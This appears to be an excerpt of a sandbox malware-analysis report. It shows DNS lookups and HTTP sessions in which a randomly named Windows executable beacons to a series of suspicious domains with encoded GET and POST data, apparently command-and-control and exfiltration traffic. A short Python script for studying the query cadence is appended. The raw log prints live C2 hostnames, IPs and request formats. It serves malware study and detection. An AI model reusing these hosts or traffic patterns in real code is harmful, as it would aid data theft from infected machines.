Sep 25, 2024 12:48:14.410517931 CEST | 192.168.2.4 | 1.1.1.1 | 0xeabf | Standard query (0) | www.useanecdotenow.tech | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:22.482840061 CEST | 192.168.2.4 | 1.1.1.1 | 0x3d0c | Standard query (0) | www.asiapartnars.online | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:35.656874895 CEST | 192.168.2.4 | 1.1.1.1 | 0x43ba | Standard query (0) | www.linkwave.cloud | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:48.999926090 CEST | 192.168.2.4 | 1.1.1.1 | 0xcf90 | Standard query (0) | www.mfgarage.net | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:49:02.639827013 CEST | 192.168.2.4 | 1.1.1.1 | 0x8cc | Standard query (0) | www.b5x7vk.agency | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 25, 2024 12:46:29.290086985 CEST | 1.1.1.1 | 192.168.2.4 | 0x2670 | No error (0) | www.2bhp.com |  | 81.88.63.46 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:46:46.027901888 CEST | 1.1.1.1 | 192.168.2.4 | 0xb222 | No error (0) | www.ultraleap.net | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 12:46:46.027901888 CEST | 1.1.1.1 | 192.168.2.4 | 0xb222 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:47:00.235361099 CEST | 1.1.1.1 | 192.168.2.4 | 0xae14 | No error (0) | www.dalong.site | dalong.site |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 12:47:00.235361099 CEST | 1.1.1.1 | 192.168.2.4 | 0xae14 | No error (0) | dalong.site |  | 172.96.187.60 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:47:13.372443914 CEST | 1.1.1.1 | 192.168.2.4 | 0x3765 | No error (0) | www.mgeducacaopro.online | mgeducacaopro.online |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 12:47:13.372443914 CEST | 1.1.1.1 | 192.168.2.4 | 0x3765 | No error (0) | mgeducacaopro.online |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:47:13.372443914 CEST | 1.1.1.1 | 192.168.2.4 | 0x3765 | No error (0) | mgeducacaopro.online |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:47:26.722474098 CEST | 1.1.1.1 | 192.168.2.4 | 0xde8b | No error (0) | www.heldhold.xyz |  | 67.223.117.189 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:47:40.263849020 CEST | 1.1.1.1 | 192.168.2.4 | 0x89ff | No error (0) | www.63582.photo | 6ybpt9er.as66588.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 12:47:40.263849020 CEST | 1.1.1.1 | 192.168.2.4 | 0x89ff | No error (0) | 6ybpt9er.as66588.com | azkwupgf.as66588.com |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 12:47:40.263849020 CEST | 1.1.1.1 | 192.168.2.4 | 0x89ff | No error (0) | azkwupgf.as66588.com |  | 103.248.137.209 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:14.420882940 CEST | 1.1.1.1 | 192.168.2.4 | 0xeabf | Name error (3) | www.useanecdotenow.tech | none | none | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:22.500354052 CEST | 1.1.1.1 | 192.168.2.4 | 0x3d0c | No error (0) | www.asiapartnars.online | asiapartnars.online |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 12:48:22.500354052 CEST | 1.1.1.1 | 192.168.2.4 | 0x3d0c | No error (0) | asiapartnars.online |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:22.500354052 CEST | 1.1.1.1 | 192.168.2.4 | 0x3d0c | No error (0) | asiapartnars.online |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:35.847975016 CEST | 1.1.1.1 | 192.168.2.4 | 0x43ba | No error (0) | www.linkwave.cloud | linkwave.cloud |  | CNAME (Canonical name) | IN (0x0001) | false
Sep 25, 2024 12:48:35.847975016 CEST | 1.1.1.1 | 192.168.2.4 | 0x43ba | No error (0) | linkwave.cloud |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:35.847975016 CEST | 1.1.1.1 | 192.168.2.4 | 0x43ba | No error (0) | linkwave.cloud |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:48:49.221343040 CEST | 1.1.1.1 | 192.168.2.4 | 0xcf90 | No error (0) | www.mfgarage.net |  | 85.153.138.113 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:49:02.766263962 CEST | 1.1.1.1 | 192.168.2.4 | 0x8cc | No error (0) | www.b5x7vk.agency |  | 104.21.11.31 | A (IP address) | IN (0x0001) | false
Sep 25, 2024 12:49:02.766263962 CEST | 1.1.1.1 | 192.168.2.4 | 0x8cc | No error (0) | www.b5x7vk.agency |  | 172.67.165.25 | A (IP address) | IN (0x0001) | false
                                              • www.2bhp.com
                                              • www.ultraleap.net
                                              • www.dalong.site
                                              • www.mgeducacaopro.online
                                              • www.heldhold.xyz
                                              • www.63582.photo
                                              • www.asiapartnars.online
                                              • www.linkwave.cloud
                                              • www.mfgarage.net
                                              • www.b5x7vk.agency
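The DNS tables above are more useful as a pattern than as a list of hostnames: one process resolving eleven unrelated names in strict sequence, at a near-constant interval, with three of them landing on the same two addresses. The script below is an added example (not part of the Joe Sandbox report) that transcribes the report's query and answer rows and computes the cadence, follows each CNAME chain, and groups names by final address. The row data is copied from the report; the function names and the analysis are this example's own.

```python
from collections import defaultdict
from statistics import median
from typing import Dict, List, Optional, Tuple

# (time of day, transaction id, queried name), transcribed from the report's query table.
QUERIES: List[Tuple[str, int, str]] = [
    ("12:46:29.240736961", 0x2670, "www.2bhp.com"),
    ("12:46:45.061227083", 0xb222, "www.ultraleap.net"),
    ("12:46:59.967919111", 0xae14, "www.dalong.site"),
    ("12:47:13.358769894", 0x3765, "www.mgeducacaopro.online"),
    ("12:47:26.543175936", 0xde8b, "www.heldhold.xyz"),
    ("12:47:40.046143055", 0x89ff, "www.63582.photo"),
    ("12:48:14.410517931", 0xeabf, "www.useanecdotenow.tech"),
    ("12:48:22.482840061", 0x3d0c, "www.asiapartnars.online"),
    ("12:48:35.656874895", 0x43ba, "www.linkwave.cloud"),
    ("12:48:48.999926090", 0xcf90, "www.mfgarage.net"),
    ("12:49:02.639827013", 0x08cc, "www.b5x7vk.agency"),
]
# (transaction id, reply code, name, cname, address), transcribed from the
# report's answer table; None where the report shows no value in that cell.
ANSWERS: List[Tuple[int, int, str, Optional[str], Optional[str]]] = [
    (0x2670, 0, "www.2bhp.com", None, "81.88.63.46"),
    (0xb222, 0, "www.ultraleap.net", "webredir.vip.gandi.net", None),
    (0xb222, 0, "webredir.vip.gandi.net", None, "217.70.184.50"),
    (0xae14, 0, "www.dalong.site", "dalong.site", None),
    (0xae14, 0, "dalong.site", None, "172.96.187.60"),
    (0x3765, 0, "www.mgeducacaopro.online", "mgeducacaopro.online", None),
    (0x3765, 0, "mgeducacaopro.online", None, "3.33.130.190"),
    (0x3765, 0, "mgeducacaopro.online", None, "15.197.148.33"),
    (0xde8b, 0, "www.heldhold.xyz", None, "67.223.117.189"),
    (0x89ff, 0, "www.63582.photo", "6ybpt9er.as66588.com", None),
    (0x89ff, 0, "6ybpt9er.as66588.com", "azkwupgf.as66588.com", None),
    (0x89ff, 0, "azkwupgf.as66588.com", None, "103.248.137.209"),
    (0xeabf, 3, "www.useanecdotenow.tech", None, None),
    (0x3d0c, 0, "www.asiapartnars.online", "asiapartnars.online", None),
    (0x3d0c, 0, "asiapartnars.online", None, "3.33.130.190"),
    (0x3d0c, 0, "asiapartnars.online", None, "15.197.148.33"),
    (0x43ba, 0, "www.linkwave.cloud", "linkwave.cloud", None),
    (0x43ba, 0, "linkwave.cloud", None, "3.33.130.190"),
    (0x43ba, 0, "linkwave.cloud", None, "15.197.148.33"),
    (0xcf90, 0, "www.mfgarage.net", None, "85.153.138.113"),
    (0x08cc, 0, "www.b5x7vk.agency", None, "104.21.11.31"),
    (0x08cc, 0, "www.b5x7vk.agency", None, "172.67.165.25"),
]


def to_seconds(ts: str) -> float:
    """'12:46:29.240736961' -> seconds since midnight; float() keeps the nanoseconds."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def query_intervals() -> List[float]:
    """Seconds between consecutive queries, in report order."""
    t = [to_seconds(ts) for ts, _, _ in QUERIES]
    return [round(b - a, 3) for a, b in zip(t, t[1:])]


def resolve_chain(txid: int) -> Tuple[List[str], List[str], int]:
    """Follow the CNAMEs of one transaction: (names visited, final addresses, rcode)."""
    name = next(n for _, t, n in QUERIES if t == txid)
    rows = [a for a in ANSWERS if a[0] == txid]
    rcode = rows[0][1] if rows else -1
    chain, addrs = [name], []
    while True:
        nxt = None
        for _, _, n, cname, addr in rows:
            if n == chain[-1]:
                if cname:
                    nxt = cname
                elif addr:
                    addrs.append(addr)
        if nxt is None or nxt in chain:  # end of chain, or a CNAME loop
            return chain, addrs, rcode
        chain.append(nxt)


def shared_addresses() -> Dict[str, List[str]]:
    """Addresses reached by more than one of the queried names."""
    by_addr: Dict[str, set] = defaultdict(set)
    for _, txid, name in QUERIES:
        for addr in resolve_chain(txid)[1]:
            by_addr[addr].add(name)
    return {a: sorted(n) for a, n in by_addr.items() if len(n) > 1}


def summary() -> Dict:
    iv = query_intervals()
    return {
        "registrable_domains": len({n.split(".", 1)[1] for _, _, n in QUERIES}),
        "median_interval_s": round(median(iv), 3),
        "min_interval_s": min(iv),
        "max_interval_s": max(iv),
        "nxdomain": [n for _, t, n in QUERIES if resolve_chain(t)[2] == 3],
        "shared_addresses": shared_addresses(),
    }
```

On the report's rows the median gap between queries is about 13.4 s, the one NXDOMAIN (www.useanecdotenow.tech) is followed by the shortest gap of about 8 s, and the longest gap (about 34 s) sits between www.63582.photo and the next name; www.mgeducacaopro.online, www.asiapartnars.online and www.linkwave.cloud all resolve to 3.33.130.190 and 15.197.148.33. A detection built on this shape (many distinct registrable domains from one process at a fixed cadence) survives the next sample's domain list in a way that a hostname blocklist does not.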
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:46:29.308563948 CEST | 504 | OUT | GET /a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.2bhp.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Sep 25, 2024 12:46:29.988576889 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 10:46:29 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 217.70.184.50 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:46:46.048444986 CEST | 769 | OUT | POST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 76 6d 39 63 42 63 65 56 73 4c 48 56 55 55 63 2b 39 67 31 66 62 72 70 56 46 65 49 5a 7a 77 55 46 41 3d 3d
                                              Data Ascii: PR_xXrA=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jvm9cBceVsLHVUUc+9g1fbrpVFeIZzwUFA==
Sep 25, 2024 12:46:46.637725115 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 10:46:46 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 217.70.184.50 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:46:48.591730118 CEST | 789 | OUT | POST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 2f 31 49 55 6b 54 45 73 63 79 35 44 4e 50 41 67 73 49 54 49 4d 68 50 70 71 51 58 67 61 33 72 34 76 6b 4b 75 67 70 76 4f 36 45 36 62 6a 47 34 4a 42 4c 48 34 78 51 76 36 4f 4b 59 53 75 4e 5a 32 58 51 61 61 38 72 4d 6d 73 35 4f 45 76 6e 65 73 47 36 50 33 6e 65 68 55 33 48 4c 6e 69 73 57 54 42 79 36 78 55 50 34 55 42 2b 5a 50 44 4c 6c 30 6e 43 7a 67 2f 36 76 4b 4c 39 65 52 51 52 5a 66 4c 42 51 53 46 47 76 4d 42 69 4e 62 50 61 49 43 58 38 55 77 4e 64 65 41 4a 68 4b 56 4d 38 52 65 66 58 64 50 76 42 4c 45 79 78 74 45 67 3d
                                              Data Ascii: PR_xXrA=e/XjuvFYh54wiZhAzxjNRLsjQqM3yPQvGWVtc0rW3H/1IUkTEscy5DNPAgsITIMhPpqQXga3r4vkKugpvO6E6bjG4JBLH4xQv6OKYSuNZ2XQaa8rMms5OEvnesG6P3nehU3HLnisWTBy6xUP4UB+ZPDLl0nCzg/6vKL9eRQRZfLBQSFGvMBiNbPaICX8UwNdeAJhKVM8RefXdPvBLEyxtEg=
Sep 25, 2024 12:46:49.215470076 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 10:46:49 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 217.70.184.50 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:46:51.139370918 CEST | 10871 | OUT | POST /8pln/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.ultraleap.net
                                              Origin: http://www.ultraleap.net
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.ultraleap.net/8pln/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 69 5a 68 41 7a 78 6a 4e 52 4c 73 6a 51 71 4d 33 79 50 51 76 47 57 56 74 63 30 72 57 33 48 33 31 49 68 77 54 46 4c 41 79 34 44 4e 50 44 67 73 4c 54 49 4d 6f 50 70 79 55 58 67 57 42 72 2b 72 6b 49 4d 59 70 70 2f 36 45 78 62 6a 47 30 70 42 4f 61 49 78 42 76 2b 71 56 59 53 2b 4e 5a 32 58 51 61 59 6b 72 62 69 34 35 43 6b 76 6b 49 63 47 2b 46 6e 6e 36 68 55 76 58 4c 6e 75 38 57 69 68 79 37 51 6b 50 30 47 5a 2b 61 76 44 4a 6d 30 6e 61 7a 67 69 36 76 4f 72 4c 65 53 4e 38 5a 59 37 42 51 56 38 51 35 4f 45 2b 58 71 66 70 56 54 50 76 55 79 46 6e 58 33 52 32 44 45 45 44 4f 65 58 50 47 49 48 46 4d 6d 32 79 75 78 73 33 79 49 30 62 67 78 54 31 76 59 77 46 50 6c 63 4e 6b 43 55 61 77 63 32 33 53 32 73 38 46 79 41 50 50 64 48 67 6a 31 39 62 54 38 61 6b 38 73 72 51 31 6a 54 59 71 49 70 5a 37 5a 4f 42 66 30 55 49 38 66 74 56 56 43 48 68 41 46 70 65 70 39 6b 51 48 32 31 4b 4b 4e 42 48 77 61 59 6d 4c 2b 38 54 38 78 47 41 4d 72 71 65 74 36 68 4e 78 78 55 5a 65 31 [TRUNCATED]
Data Ascii: PR_xXrA= [TRUNCATED]
Sep 25, 2024 12:46:51.747678995 CEST | 713 | IN | HTTP/1.1 502 Bad Gateway
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 10:46:51 GMT
                                              Content-Type: text/html
                                              Content-Length: 568
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 217.70.184.50 | 80 | 3368 | C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 12:46:54.357356071 CEST | 509 | OUT | GET /8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.ultraleap.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
Sep 25, 2024 12:46:54.950181007 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 25 Sep 2024 10:46:54 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Vary: Accept-Language
